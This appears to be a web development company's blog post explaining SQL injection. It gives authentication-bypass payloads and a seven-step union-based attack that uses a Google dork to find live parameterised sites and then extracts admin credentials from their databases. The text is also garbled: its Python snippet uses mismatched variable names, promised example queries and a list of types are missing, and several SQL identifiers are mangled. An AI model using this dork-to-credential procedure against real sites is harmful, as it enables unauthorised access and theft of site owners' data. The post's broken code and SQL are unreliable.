SQL injection is a code injection technique used to hack websites, attack data applications, destroy databases by inserting malicious SQL statements into input boxes for execution (for example, downloading database-driven content into a database). These declarations control a database server behind a web application.
“The OWASP organization (Open Web Application Security Project) has published a list of injections in its OWASP Top 10 document and has declared them as the number one threat to web application security.”
SQL injection attacks are one of the oldest, most frequent and most dangerous web application vulnerabilities. A SQL injection vulnerability can affect any application or website that uses an SQL database such as MySQL, Oracle, SQL Server or other.
SQL injection can be used in different ways to cause serious problems. By taking advantage of SQL injection, an attacker could ignore authentication and can access, modify, and delete data within a database. In some cases, SQL injection can even be used to execute commands in the operating system, potentially allowing the attacker to become more harmful to attack within a network behind a firewall.
In-band SQL injection is the most common and easy-to-take-advantage kind of SQL injection attacks. It occurs when an attacker uses the same communication channel to launch the attack as well as to get results. The two most common types of in-band SQL Injection are Error-Based SQLi and Union-Based SQLi.
The inferential injection of SQL, unlike SQLi in-band, may take longer to attack, however it is just as dangerous as any other form of SQLi. In an inferential SQLi attack, the data is not actually transferred via the web application thus, the attacker cannot see the result of the attack within the band (so these attacks are commonly referred to as “Blind SQL Injection Attacks”). Instead, the attacker can rebuild the database structure by sending payloads, observing the response of the web application and the resulting behavior of the database server.
There are two types of inferential SQL injection as described below-
It shows how an attacker can use a SQL Injection vulnerability to control the security of the application and authenticate as an administrator.
The following script is executed on a web server. It is an example of authentication with a username and password. The sample database has a table called users with the following columns: username and password.
username = request.POST['username']
password = request.POST['password']
#Generate SQL Command.
sql_query = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”
#Execute the SQL Command
These input fields are vulnerable to SQL injection. An attacker could use SQL commands in the entry in a way that would alter the SQL statement executed by the database server. For example:
As a result, the database server executes the following SQL query:
Because of the OR 1 = 1, the WHERE clause returns the first id of the user table, regardless of the user name and password. The first user ID in a database is very often the administrator. In this way, the attacker not only ignores authentication but also obtains administrator privileges. They can also comment on the rest of the SQL statement to further control the execution of the SQL query:
— MySQL, MSSQL, Oracle, PostgreSQL, SQLite
‘ OR ‘1’=’1′ —
‘ OR ‘1’=’1′ /*
‘ OR ‘1’=’1′ #
One of the most common types of SQL injection uses the UNION operator. It allows the attacker to combine the results of two or more SELECT statements into a single result. The technique is called SQL-based injection.
Step1: use google dork to find the parametric link –
e.g. inurl:.php?id=3 site:.nl
Step2: After finding the link try to check if there is any database is available or not –
http://www.xyz.com/content.php?Id=-2 or =2′ (you will get the following link) after this put ” ‘ ” single quote after number, in our case it is 3. After hitting on the URL if it shows an error then it shows that there is a database exists on the website.
Step 3: This step is used to check the number of tables present in the database of the website –
http://www.xyz.com/content.php?Id-2 order by 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13 –+-
Step 4: After checking the number of tables, now select the table that this is display on the webpage –
http://www.xyz.com/content.php?Id=-2 union select table name, 3, 4, 5, 6, 7, 8,9,10,11,12,13 from information schema.tables–+-
Step 5: this step will concat the table name that we are going to target –
http://www.xyz.com/content.php?Id=-2 union select 1, group concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table schema=database() –+-
Step 6: It retrieve all the column name from the table –
http://www.xyz.com/content.php?Id=-2 union select 1, group_concat (column name),3,4,5,6,7,8, 9,10,11,12,13 from information_schema.columns where table_name=’tbl admin’ –+
Step 7: It get the required entity that user wants form the table –
http://www.xyz.com/content.php?Id=-2 union select 1, group concat (plugin, ‘ $$$’,pass),3,4,5,6,7,8,9,10,11,12,13 from tbl_admin –+-
Click here to know about Ransomware Attack
After doing these examples we can check the vulnerabilities of data breaching manually from our web application. Here Data Breaching means getting all the data over the web application by unauthorized access. We provide best web development support and mobile development services and support for you, contact us if you have something to build.
Tell your friends and colleagues about these threats if they are unaware of it, it can save their money and their data to destroy. If you have any questions and queries in mind then ask in the comment section.